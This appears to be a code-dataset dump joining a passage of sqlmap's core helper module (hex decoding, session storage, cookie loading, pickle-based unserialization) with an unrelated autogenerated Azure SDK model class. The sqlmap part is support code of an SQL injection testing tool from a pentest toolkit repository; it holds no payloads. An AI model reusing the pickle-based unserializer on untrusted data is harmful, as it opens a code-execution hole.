Serializes given object
"""
return base64pickle(object_)
def unserializeObject(value):
"""
Unserializes object from given serialized form
>>> unserializeObject(serializeObject([1, 2, 3])) == [1, 2, 3]
True
"""
return base64unpickle(value) if value else None
def resetCounter(technique):
"""
Resets query counter for a given technique
"""
kb.counters[technique] = 0
def incrementCounter(technique):
"""
Increments query counter for a given technique
"""
kb.counters[technique] = getCounter(technique) + 1
def getCounter(technique):
"""
Returns query counter for a given technique
"""
return kb.counters.get(technique, 0)
def applyFunctionRecursively(value, function):
"""
Applies function recursively through list-like structures
>>> applyFunctionRecursively([1, 2, [3, 4, [19]], -9], lambda _: _ > 0)
[True, True, [True, True, [True]], False]
"""
if isListLike(value):
retVal = [applyFunctionRecursively(_, function) for _ in value]
else:
retVal = function(value)
return retVal
def decodeHexValue(value):
"""
Returns value decoded from DBMS specific hexadecimal representation
>>> decodeHexValue('3132332031')
u'123 1'
"""
retVal = value
def _(value):
retVal = value
if value and isinstance(value, basestring) and len(value) % 2 == 0:
retVal = hexdecode(retVal)
if not kb.binaryField:
if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"):
try:
retVal = retVal.decode("utf-16-le")
except UnicodeDecodeError:
pass
elif Backend.isDbms(DBMS.HSQLDB):
try:
retVal = retVal.decode("utf-16-be")
except UnicodeDecodeError:
pass
if not isinstance(retVal, unicode):
retVal = getUnicode(retVal, "utf8")
return retVal
try:
retVal = applyFunctionRecursively(value, _)
except:
singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value)
return retVal
def extractExpectedValue(value, expected):
"""
Extracts and returns expected value by a given type
>>> extractExpectedValue(['1'], EXPECTED.BOOL)
True
>>> extractExpectedValue('1', EXPECTED.INT)
1
"""
if expected:
value = unArrayizeValue(value)
if isNoneValue(value):
value = None
elif expected == EXPECTED.BOOL:
if isinstance(value, int):
value = bool(value)
elif isinstance(value, basestring):
value = value.strip().lower()
if value in ("true", "false"):
value = value == "true"
elif value in ("1", "-1"):
value = True
elif value == "0":
value = False
else:
value = None
elif expected == EXPECTED.INT:
if isinstance(value, basestring):
value = int(value) if value.isdigit() else None
return value
def hashDBWrite(key, value, serialize=False):
"""
Helper function for writing session data to HashDB
"""
_ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE)
conf.hashDB.write(_, value, serialize)
def hashDBRetrieve(key, unserialize=False, checkConf=False):
"""
Helper function for restoring session data from HashDB
"""
_ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE)
retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None
if not kb.inferenceMode and not kb.fileReadMode and any(_ in (retVal or "") for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)):
retVal = None
return retVal
def resetCookieJar(cookieJar):
"""
Cleans cookies from a given cookie jar
"""
if not conf.loadCookies:
cookieJar.clear()
else:
try:
if not cookieJar.filename:
infoMsg = "loading cookies from '%s'" % conf.loadCookies
logger.info(infoMsg)
content = readCachedFileContent(conf.loadCookies)
lines = filter(None, (line.strip() for line in content.split("\n") if not line.startswith('#')))
handle, filename = tempfile.mkstemp(prefix="sqlmapcj-")
os.close(handle)
# Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html
with open(filename, "w+b") as f:
f.write("%s\n" % NETSCAPE_FORMAT_HEADER_COOKIES)
for line in lines:
_ = line.split()
if len(_) == 7:
_[4] = FORCE_COOKIE_EXPIRATION_TIME
f.write("\n%s" % "\t".join(_))
cookieJar.filename = filename
cookieJar.load(cookieJar.filename, ignore_expires=True)
for cookie in cookieJar:
if cookie.expires < time.time():
warnMsg = "cookie '%s' has expired" % cookie
singleTimeWarnMessage(warnMsg)
cookieJar.clear_expired_cookies()
if not cookieJar._cookies:
errMsg = "no valid cookies found"
raise SqlmapGenericException(errMsg)
except cookielib.LoadError, msg:
errMsg = "there was a problem loading "
errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", "\g<1>", str(msg))
raise SqlmapGenericException(errMsg)
def decloakToTemp(filename):
"""
Decloaks content of a given file to a temporary file with similar name and extension
"""
content = decloak(filename)
_ = os.path.split(filename[:-1])[-1]
prefix, suffix = os.path.splitext(_)
prefix = prefix.split(os.extsep)[0]
handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix)
os.close(handle)
with open(filename, "w+b") as f:
f.write(content)
return filename
def prioritySortColumns(columns):
"""
Sorts given column names by length in ascending order while those containing
string 'id' go first
>>> prioritySortColumns(['password', 'userid', 'name'])
['userid', 'name', 'password']
"""
_ = lambda x: x and "id" in x.lower()
return sorted(sorted(columns, key=len), lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0)
def getRequestHeader(request, name):
"""
Solving an issue with an urllib2 Request header case sensitivity
Reference: http://bugs.python.org/issue2275
"""
retVal = None
if request and name:
retVal = max(value if name.upper() == key.upper() else None for key, value in request.header_items())
return retVal
def isNumber(value):
"""
Returns True if the given value is a number-like object
>>> isNumber(1)
True
>>> isNumber('0')
True
>>> isNumber('foobar')
False
"""
try:
float(value)
except:
return False
else:
return True
def zeroDepthSearch(expression, value):
"""
Searches occurrences of value inside expression at 0-depth level
regarding the parentheses
"""
retVal = []
depth = 0
for index in xrange(len(expression)):
if expression[index] == '(':
depth += 1
elif expression[index] == ')':
depth -= 1
elif depth == 0 and expression[index:index + len(value)] == value:
retVal.append(index)
return retVal
def splitFields(fields, delimiter=','):
"""
Returns list of (0-depth) fields splitted by delimiter
>>> splitFields('foo, bar, max(foo, bar)')
['foo', 'bar', 'max(foo,bar)']
"""
fields = fields.replace("%s " % delimiter, delimiter)
commas = [-1, len(fields)]
commas.extend(zeroDepthSearch(fields, ','))
commas = sorted(commas)
return [fields[x + 1:y] for (x, y) in zip(commas, commas[1:])]
def pollProcess(process, suppress_errors=False):
"""
Checks for process status (prints . if still running)
"""
while True:
dataToStdout(".")
time.sleep(1)
returncode = process.poll()
if returncode is not None:
if not suppress_errors:
if returncode == 0:
dataToStdout(" done\n")
elif returncode < 0:
dataToStdout(" process terminated by signal %d\n" % returncode)
elif returncode > 0:
dataToStdout(" quit unexpectedly with return code %d\n" % returncode)
break
|
goofwear/raspberry_pwn
|
src/pentest/sqlmap/lib/core/common.py
|
Python
|
gpl-3.0
| 126,017
|
[
"VisIt"
] |
287b09412f707b06a0fa06a1329b5312061d9a8b43081a7ead7ddeb5ac2bcfdd
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class AppServiceEnvironmentResource(Resource):
"""App Service Environment ARM resource.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:param location: Resource Location.
:type location: str
:ivar type: Resource type.
:vartype type: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param app_service_environment_resource_name: Name of the App Service
Environment.
:type app_service_environment_resource_name: str
:param app_service_environment_resource_location: Location of the App
Service Environment, e.g. "West US".
:type app_service_environment_resource_location: str
:ivar provisioning_state: Provisioning state of the App Service
Environment. Possible values include: 'Succeeded', 'Failed', 'Canceled',
'InProgress', 'Deleting'
:vartype provisioning_state: str or
~azure.mgmt.web.models.ProvisioningState
:ivar status: Current status of the App Service Environment. Possible
values include: 'Preparing', 'Ready', 'Scaling', 'Deleting'
:vartype status: str or ~azure.mgmt.web.models.HostingEnvironmentStatus
:param vnet_name: Name of the Virtual Network for the App Service
Environment.
:type vnet_name: str
:param vnet_resource_group_name: Resource group of the Virtual Network.
:type vnet_resource_group_name: str
:param vnet_subnet_name: Subnet of the Virtual Network.
:type vnet_subnet_name: str
:param virtual_network: Description of the Virtual Network.
:type virtual_network: ~azure.mgmt.web.models.VirtualNetworkProfile
:param internal_load_balancing_mode: Specifies which endpoints to serve
internally in the Virtual Network for the App Service Environment.
Possible values include: 'None', 'Web', 'Publishing'
:type internal_load_balancing_mode: str or
~azure.mgmt.web.models.InternalLoadBalancingMode
:param multi_size: Front-end VM size, e.g. "Medium", "Large".
:type multi_size: str
:param multi_role_count: Number of front-end instances.
:type multi_role_count: int
:param worker_pools: Description of worker pools with worker size IDs, VM
sizes, and number of workers in each pool.
:type worker_pools: list[~azure.mgmt.web.models.WorkerPool]
:param ipssl_address_count: Number of IP SSL addresses reserved for the
App Service Environment.
:type ipssl_address_count: int
:ivar database_edition: Edition of the metadata database for the App
Service Environment, e.g. "Standard".
:vartype database_edition: str
:ivar database_service_objective: Service objective of the metadata
database for the App Service Environment, e.g. "S0".
:vartype database_service_objective: str
:ivar upgrade_domains: Number of upgrade domains of the App Service
Environment.
:vartype upgrade_domains: int
:ivar subscription_id: Subscription of the App Service Environment.
:vartype subscription_id: str
:param dns_suffix: DNS suffix of the App Service Environment.
:type dns_suffix: str
:ivar last_action: Last deployment action on the App Service Environment.
:vartype last_action: str
:ivar last_action_result: Result of the last deployment action on the App
Service Environment.
:vartype last_action_result: str
:ivar allowed_multi_sizes: List of comma separated strings describing
which VM sizes are allowed for front-ends.
:vartype allowed_multi_sizes: str
:ivar allowed_worker_sizes: List of comma separated strings describing
which VM sizes are allowed for workers.
:vartype allowed_worker_sizes: str
:ivar maximum_number_of_machines: Maximum number of VMs in the App Service
Environment.
:vartype maximum_number_of_machines: int
:ivar vip_mappings: Description of IP SSL mapping for the App Service
Environment.
:vartype vip_mappings: list[~azure.mgmt.web.models.VirtualIPMapping]
:ivar environment_capacities: Current total, used, and available worker
capacities.
:vartype environment_capacities:
list[~azure.mgmt.web.models.StampCapacity]
:param network_access_control_list: Access control list for controlling
traffic to the App Service Environment.
:type network_access_control_list:
list[~azure.mgmt.web.models.NetworkAccessControlEntry]
:ivar environment_is_healthy: True/false indicating whether the App
Service Environment is healthy.
:vartype environment_is_healthy: bool
:ivar environment_status: Detailed message about with results of the last
check of the App Service Environment.
:vartype environment_status: str
:ivar resource_group: Resource group of the App Service Environment.
:vartype resource_group: str
:param front_end_scale_factor: Scale factor for front-ends.
:type front_end_scale_factor: int
:ivar default_front_end_scale_factor: Default Scale Factor for FrontEnds.
:vartype default_front_end_scale_factor: int
:param api_management_account_id: API Management Account associated with
the App Service Environment.
:type api_management_account_id: str
:param suspended: <code>true</code> if the App Service Environment is
suspended; otherwise, <code>false</code>. The environment can be
suspended, e.g. when the management endpoint is no longer available
(most likely because NSG blocked the incoming traffic).
:type suspended: bool
:param dynamic_cache_enabled: True/false indicating whether the App
Service Environment is suspended. The environment can be suspended e.g.
when the management endpoint is no longer available
(most likely because NSG blocked the incoming traffic).
:type dynamic_cache_enabled: bool
:param cluster_settings: Custom settings for changing the behavior of the
App Service Environment.
:type cluster_settings: list[~azure.mgmt.web.models.NameValuePair]
:param user_whitelisted_ip_ranges: User added ip ranges to whitelist on
ASE db
:type user_whitelisted_ip_ranges: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'location': {'required': True},
'type': {'readonly': True},
'app_service_environment_resource_name': {'required': True},
'app_service_environment_resource_location': {'required': True},
'provisioning_state': {'readonly': True},
'status': {'readonly': True},
'virtual_network': {'required': True},
'worker_pools': {'required': True},
'database_edition': {'readonly': True},
'database_service_objective': {'readonly': True},
'upgrade_domains': {'readonly': True},
'subscription_id': {'readonly': True},
'last_action': {'readonly': True},
'last_action_result': {'readonly': True},
'allowed_multi_sizes': {'readonly': True},
'allowed_worker_sizes': {'readonly': True},
'maximum_number_of_machines': {'readonly': True},
'vip_mappings': {'readonly': True},
'environment_capacities': {'readonly': True},
'environment_is_healthy': {'readonly': True},
'environment_status': {'readonly': True},
'resource_group': {'readonly': True},
'default_front_end_scale_factor': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'app_service_environment_resource_name': {'key': 'properties.name', 'type': 'str'},
'app_service_environment_resource_location': {'key': 'properties.location', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'ProvisioningState'},
'status': {'key': 'properties.status', 'type': 'HostingEnvironmentStatus'},
'vnet_name': {'key': 'properties.vnetName', 'type': 'str'},
'vnet_resource_group_name': {'key': 'properties.vnetResourceGroupName', 'type': 'str'},
'vnet_subnet_name': {'key': 'properties.vnetSubnetName', 'type': 'str'},
'virtual_network': {'key': 'properties.virtualNetwork', 'type': 'VirtualNetworkProfile'},
'internal_load_balancing_mode': {'key': 'properties.internalLoadBalancingMode', 'type': 'InternalLoadBalancingMode'},
'multi_size': {'key': 'properties.multiSize', 'type': 'str'},
'multi_role_count': {'key': 'properties.multiRoleCount', 'type': 'int'},
'worker_pools': {'key': 'properties.workerPools', 'type': '[WorkerPool]'},
'ipssl_address_count': {'key': 'properties.ipsslAddressCount', 'type': 'int'},
'database_edition': {'key': 'properties.databaseEdition', 'type': 'str'},
'database_service_objective': {'key': 'properties.databaseServiceObjective', 'type': 'str'},
'upgrade_domains': {'key': 'properties.upgradeDomains', 'type': 'int'},
'subscription_id': {'key': 'properties.subscriptionId', 'type': 'str'},
'dns_suffix': {'key': 'properties.dnsSuffix', 'type': 'str'},
'last_action': {'key': 'properties.lastAction', 'type': 'str'},
'last_action_result': {'key': 'properties.lastActionResult', 'type': 'str'},
'allowed_multi_sizes': {'key': 'properties.allowedMultiSizes', 'type': 'str'},
'allowed_worker_sizes': {'key': 'properties.allowedWorkerSizes', 'type': 'str'},
'maximum_number_of_machines': {'key': 'properties.maximumNumberOfMachines', 'type': 'int'},
'vip_mappings': {'key': 'properties.vipMappings', 'type': '[VirtualIPMapping]'},
'environment_capacities': {'key': 'properties.environmentCapacities', 'type': '[StampCapacity]'},
'network_access_control_list': {'key': 'properties.networkAccessControlList', 'type': '[NetworkAccessControlEntry]'},
'environment_is_healthy': {'key': 'properties.environmentIsHealthy', 'type': 'bool'},
'environment_status': {'key': 'properties.environmentStatus', 'type': 'str'},
'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
'front_end_scale_factor': {'key': 'properties.frontEndScaleFactor', 'type': 'int'},
'default_front_end_scale_factor': {'key': 'properties.defaultFrontEndScaleFactor', 'type': 'int'},
'api_management_account_id': {'key': 'properties.apiManagementAccountId', 'type': 'str'},
'suspended': {'key': 'properties.suspended', 'type': 'bool'},
'dynamic_cache_enabled': {'key': 'properties.dynamicCacheEnabled', 'type': 'bool'},
'cluster_settings': {'key': 'properties.clusterSettings', 'type': '[NameValuePair]'},
'user_whitelisted_ip_ranges': {'key': 'properties.userWhitelistedIpRanges', 'type': '[str]'},
}
def __init__(self, location, app_service_environment_resource_name, app_service_environment_resource_location, virtual_network, worker_pools, kind=None, tags=None, vnet_name=None, vnet_resource_group_name=None, vnet_subnet_name=None, internal_load_balancing_mode=None, multi_size=None, multi_role_count=None, ipssl_address_count=None, dns_suffix=None, network_access_control_list=None, front_end_scale_factor=None, api_management_account_id=None, suspended=None, dynamic_cache_enabled=None, cluster_settings=None, user_whitelisted_ip_ranges=None):
super(AppServiceEnvironmentResource, self).__init__(kind=kind, location=location, tags=tags)
self.app_service_environment_resource_name = app_service_environment_resource_name
self.app_service_environment_resource_location = app_service_environment_resource_location
self.provisioning_state = None
self.status = None
self.vnet_name = vnet_name
self.vnet_resource_group_name = vnet_resource_group_name
self.vnet_subnet_name = vnet_subnet_name
self.virtual_network = virtual_network
self.internal_load_balancing_mode = internal_load_balancing_mode
self.multi_size = multi_size
self.multi_role_count = multi_role_count
self.worker_pools = worker_pools
self.ipssl_address_count = ipssl_address_count
self.database_edition = None
self.database_service_objective = None
self.upgrade_domains = None
self.subscription_id = None
self.dns_suffix = dns_suffix
self.last_action = None
self.last_action_result = None
self.allowed_multi_sizes = None
self.allowed_worker_sizes = None
self.maximum_number_of_machines = None
self.vip_mappings = None
self.environment_capacities = None
self.network_access_control_list = network_access_control_list
self.environment_is_healthy = None
self.environment_status = None
self.resource_group = None
self.front_end_scale_factor = front_end_scale_factor
self.default_front_end_scale_factor = None
self.api_management_account_id = api_management_account_id
self.suspended = suspended
self.dynamic_cache_enabled = dynamic_cache_enabled
self.cluster_settings = cluster_settings
self.user_whitelisted_ip_ranges = user_whitelisted_ip_ranges
|
lmazuel/azure-sdk-for-python
|
azure-mgmt-web/azure/mgmt/web/models/app_service_environment_resource.py
|
Python
|
mit
| 13,994
|
[
"ASE"
] |
9198f9702a17d17c406e87c7d3f7e38f4040deff371ed6254a0755ab723f6525
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.